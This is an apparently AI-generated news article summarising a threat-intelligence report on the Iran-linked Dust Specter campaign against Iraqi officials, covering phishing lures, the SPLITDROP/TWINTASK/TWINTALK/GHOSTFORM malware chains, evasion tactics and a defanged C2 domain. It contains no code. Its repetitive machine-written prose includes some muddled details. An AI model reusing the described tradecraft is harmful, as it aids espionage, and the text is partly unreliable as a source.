Ethical Hacking News
Iran-nexus APT Dust Specter has been linked to a recent campaign targeting Iraqi officials with phishing emails delivering new malware families. The attackers used sophisticated tactics, including password-protected archives, droppers disguised as legitimate software applications, and C2 servers with randomized delays to evade detection. This incident highlights the growing concern of Iranian threat actors expanding their reach into new regions and targeting high-value targets.
The Dust Specter group, linked to Iranian intelligence operations, targeted Iraqi officials with phishing emails delivering new malware families. The attackers impersonated Iraq's Ministry of Foreign Affairs in phishing messages, exploiting human elements to gain access to high-value targets. The campaign utilized previously unseen malware families including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM through multiple infection chains. ThreatLabz researchers identified unusual AI-generated code in the TWINTALK and GHOSTFORM malware, highlighting the growing use of generative AI in malware development. The campaign used various tactics, techniques, and procedures typical of Iranian threat actors to evade detection. The attackers used a ClickFix lure disguised as a Cisco Webex meeting page to trick victims into running malicious PowerShell commands. The incident highlights the growing concern of Iranian threat actors expanding their reach into new regions and targeting high-value targets.
Iran-nexus APT Dust Specter, a sophisticated threat actor linked to Iranian intelligence operations, has been identified as the perpetrator behind a recent campaign targeting Iraqi officials with phishing emails delivering new malware families. The campaign, which began in January 2026, utilized previously unseen malware families including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM, through multiple infection chains.
The attackers impersonated Iraq's Ministry of Foreign Affairs in phishing messages that delivered these malicious payloads, exploiting the human element to gain access to high-value targets. The Dust Specter group, also known as Iran-nexus APT, is a well-documented Iranian threat actor known for its sophisticated cyber-espionage operations and targeting of government officials.
The attackers used various tactics, techniques, and procedures (TTPs) typical of Iranian threat actors, including the use of password-protected archives, droppers disguised as legitimate software applications, and C2 servers with randomized delays and custom URI paths to evade detection. The malware employed stealth techniques such as invisible Windows forms for delayed execution and mutex checks to avoid multiple instances.
ThreatLabz researchers analyzed two attack chains used in the Dust Specter campaign, highlighting the sophistication of the threat actor's tactics. Attack Chain 1 began with a password-protected archive containing a dropper named SPLITDROP, disguised as a WinRAR application. Once executed, it decrypted and deployed two modules: TWINTASK, a worker component that executed PowerShell commands from a local file, and TWINTALK, a command-and-control (C2) orchestrator.
Attack Chain 2, called GHOSTFORM, consolidated the same functionality into a single binary that executed commands directly in memory, reducing filesystem traces. It also opened a fake Google Form posing as a survey from Iraq's Ministry of Foreign Affairs to lure victims. The malware employed stealth techniques such as invisible Windows forms for delayed execution and mutex checks to avoid multiple instances.
ThreatLabz researchers identified unusual elements in the code, including emojis and Unicode text embedded in functions, suggesting that generative AI may have been used to develop the TWINTALK and GHOSTFORM malware. This finding highlights the growing use of artificial intelligence in malware development, a trend that is expected to continue as threat actors seek to stay ahead of security measures.
The campaign also utilized a ClickFix lure disguised as a Cisco Webex meeting page to trick victims into running malicious PowerShell commands that download and schedule malware execution. The attackers used a C2 domain, meetingapp[.]site, to host a web page disguised as a Cisco Webex meeting invitation, further demonstrating their sophistication in using legitimate platforms to deliver malicious payloads.
ThreatLabz attributes the activity to Dust Specter, an Iran-linked threat actor, citing targeting patterns, malware design, and tactics consistent with previous Iranian cyber-espionage operations. The campaign likely targeted government officials using convincing social engineering lures impersonating Iraq's Ministry of Foreign Affairs.
This incident highlights the growing concern of Iranian threat actors expanding their reach into new regions and targeting high-value targets. As cybersecurity measures continue to evolve, threat actors are adapting and improving their tactics, making it essential for organizations and governments to stay vigilant and implement robust security protocols to protect against such threats.
In conclusion, the Dust Specter campaign marks a significant escalation in Iranian cyber-espionage operations, with sophisticated tactics and techniques used to target high-value targets. As the threat landscape continues to evolve, it is crucial for organizations and governments to remain proactive in monitoring and mitigating the risks posed by such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/Iran-nexus-APT-Dust-Specter-Escalating-Threat-to-Global-Cybersecurity-ehn.shtml
https://securityaffairs.com/189033/apt/iran-nexus-apt-dust-specter-targets-iraq-officials-with-new-malware.html
https://cybersecuritynews.com/iran-nexus-apt-dust-specter-hits-iraqi-officials/
https://thehackernews.com/2026/03/dust-specter-targets-iraqi-officials.html
https://www.scworld.com/brief/iran-targets-iraqi-government-officials-with-multiple-new-malware-strains
https://www.zscaler.com/blogs/security-research/dust-specter-apt-targets-government-officials-iraq
https://securityboulevard.com/2026/03/dust-specter-apt-targets-government-officials-in-iraq/
https://www.pcrisk.com/removal-guides/35022-ghostform-rat
https://gbhackers.com/iran-linked-dust-specter/
Published: Fri Mar 6 06:41:56 2026 by llama3.2 3B Q4_K_M
